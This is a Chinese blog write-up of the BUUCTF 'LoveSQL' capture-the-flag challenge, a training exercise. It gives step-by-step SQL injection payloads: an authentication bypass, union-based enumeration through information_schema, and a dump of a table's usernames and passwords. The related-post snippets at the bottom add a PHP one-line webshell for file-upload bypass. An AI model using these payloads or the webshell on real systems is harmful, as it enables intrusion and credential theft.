BUUCTF-Love sql

已于 2023-04-08 11:34:20 修改
阅读量319 收藏 1
点赞数 1
文章标签: 数据库 sql
于 2023-03-28 21:52:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73121489/article/details/129825568
版权

前言

sql注入的一般流程:找注入点->找列数->找回显位->报数据库->爆表->爆字段->爆数据
其他有关sql注入的知识还是麻烦师傅们自己去搜一下,以下就不过多赘述知识点

正题

在这里插入图片描述
首先,页面上方有一段字:用sqlmap是没有灵魂的
不过呢,我也不会用sqlmap。。。(新手)
直接上万能钥匙:1' or 1=1#,密码随便取。
在这里插入图片描述一次就成功。

找列数

1' order by 4#,一直试到4才报错
在这里插入图片描述

在这里插入图片描述
一共3个字段

找回显位

1' union select 1,2,3#
在这里插入图片描述
回显位置在2和3

爆数据库

1' union select 1,2,database()#
在这里插入图片描述
数据库名为geek.

爆表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述两个表:geekuser,l0ve1ysq1
不用试geekuser了,因为里面没有flag。。。

爆字段

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
在这里插入图片描述有三个字段:id,username,password

爆数据

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
在这里插入图片描述这里看着不舒服,Ctrl+u查看源代码
在这里插入图片描述
flag就在这里了。

去选择自己的路
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap压缩包
x-pack-sql-jdbc-7.4.2
02-22
x-pack-sql-jdbc-7.4.2
Buuctf[极客大挑战 2019]LoveSQL
qq_52718293的博客
06-03 240
题目打开是登录框,先尝试用万能密码 开始还以为这样就欧克了,但尝试之后发现这与flag无关。 所以还是从sql开始走一遍。 先查询一下字段 'order by 4# 字段数是四的时候报错了,后来小瑶尝试了在字段数为三时未报错。所以确定字段数是3. 之后用联合查询,看回显点位·在哪 很明显,返回值出现了2和3,说明回显点位是2和3 之后我们可以利用回显点位查询版本号和库名version(),database()(利用这两个函数) 'union select 1,version(),database()# 可.
[极客大挑战 2019]web部分题解(已完结!),网络安全开发面试基础
最新发布
m0_60635224的博客
04-08 962
那直接打指令找一下吧:cat /flag和的这里我会讲解我理解下的内容,如果有兴趣的师傅建议去原文看一下,其我真的很喜欢士别三日博客的一句话,真的建议每一位Ctfer记住!
BUUCTF】[极客大挑战 2019]LoveSQL 详细题解总结笔记 Writeup
algae
08-13 2976
BUUCTF】[极客大挑战 2019]LoveSQL一.题目内容1.考点二. 解题过程1.万能密码2.爆字段3. 一.题目内容 1.考点 二. 解题过程 1.万能密码 账号 admin' or 1=1 # 密码 1 admin 47cb230740bc6725fd194aec8e479fc4 Tips:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23 2.爆字段 check.php?username=admin ' order by 1 %23&passwo
Buuctf-web-[极客大挑战2019]LoveSQL
Yinger699的博客
06-16 257
[极客大挑战 2019]LoveSQL 首先打开这个界面,发现画面和上次做的[极客大挑战】easySQL类似。所以我们用万能密码试一下。 usename=admin;password=1’or’1’=‘1 发现用户错误,然后该换admin’#试一下,登录成功 接下来我们用SQL注入来做 1.首先查询字段数 check.php?username=admin’ order by 4%23&password=1%27or%271%271%3D%271 (因为url没有自动对#进行编码,所以我们要手动输
BUUCTF WEB笔记之[极客大挑战2019] EasySQLLoveSQL、BabySQL、HardSQL
weixin_48799157的博客
03-26 2581
小白一个,记录一下解题过程,如有错误请指正! 一、EasySQL 1.这里我们使用一句话万能密码就可以了,记得加上# 1' or '1'='1'# 2.登录就可以拿到flag 二、LoveSQL 网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~ 1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag 2.猜测flag应该是放在某个字段里了,我们用联合注入(un...
BUUCTF——[极客大挑战 2019]Upload 1
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
(文件上传upload) [极客大挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 8534
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客大挑战 2019]Upload1 ...
BUUCTF——[极客大挑战2019]Upload-1
weixin_62248541的博客
11-25 408
BUUCTF-[极客大挑战2019]Upload-1
[极客大挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
buuctf-loveSQL
xixihahawuwu的博客
11-23 1254
进入界面 没有什么明显的提示,上次有个一样界面的题目,结果直接万能密码1=1出来了,这次再试试 ?????? 啥? 简单的我有点不相信,睿智的我一下子就觉得不对经 去尝试一下MD5 就知道… 算了,接着找吧 看题目名字,lovesql 估计还是注入 只能把目标放在url上了 这边比较恶心,url转码烦死我了,老是弄乱 查询一下列 ’ order by 4%23 到四的时候报错 说明3是一个临界点,即列数为3 。。。。。 然而到这里我懵逼了,不知道要干啥了… 晕晕乎乎的。一点思路找不到… 去看了.
x-pack-sql-jdbc-6.8.0.jar
04-16
x-pack-sql-jdbc-6.8.0.jar
wjz-sqlFormat
08-23
格式化后接近PLSQL格式化效果。
T-SQL性能调优秘笈-基于SQL Server 2012窗口函数
05-24
T-SQL性能调优秘笈-基于SQL Server 2012窗口函数,适合数据库进阶。
x-pack-sql-jdbc-7.9.1.jar
03-04
x-pack-sql-jdbc-7.9.1.jar
buuctf_web_loveSQL
m0_73118788的博客
02-29 880
union select 1,2,group_concat(id,username,password) from l0ve1ysq1: 这部分是一个 UNION 查询语句,将上面的字符串 ‘1’ 与来自表 ‘l0ve1ysq1’ 的 id、username 和 password 字段值连接起来,然后将其作为一组新的查询结果。(我一个大大的疑惑)5.#: 这是一个 SQL 注释符号,用于注释掉后面的代码,避免影响查询的执行。1.table_name: 这是要获取的列的名称,表示表的名称。
CTF-Web-[极客大挑战 2019]LoveSQL
归子莫的博客
05-03 1792
CTF-Web-[极客大挑战 2019]LoveSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]LoveSQL 打开题目的实例 思路 看到这个熟悉的界面,看到...
BUUCTF【Web】LoveSQL
qq_70434663的博客
03-06 628
我们要找的flag就在l0ve1ysq1表里面,为什么在第两张表里面,请张大你的眼睛看题目。发现爆出了字段id username password,我们的flag就在password里面。接下来就是爆出字段里面的内容,步骤同上述相同。在这里注意一下,在CTFSQL注入漏洞flag通常会放在当前使用的数据库,这里已经有了数据库所以可以直接爆出数据库的表。既然万能用户名行不通,那么我们就使用万能密码,用户名使用admin。既然爆出了表,接下来就是爆出表里面的字段了,同样的使用payload。
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值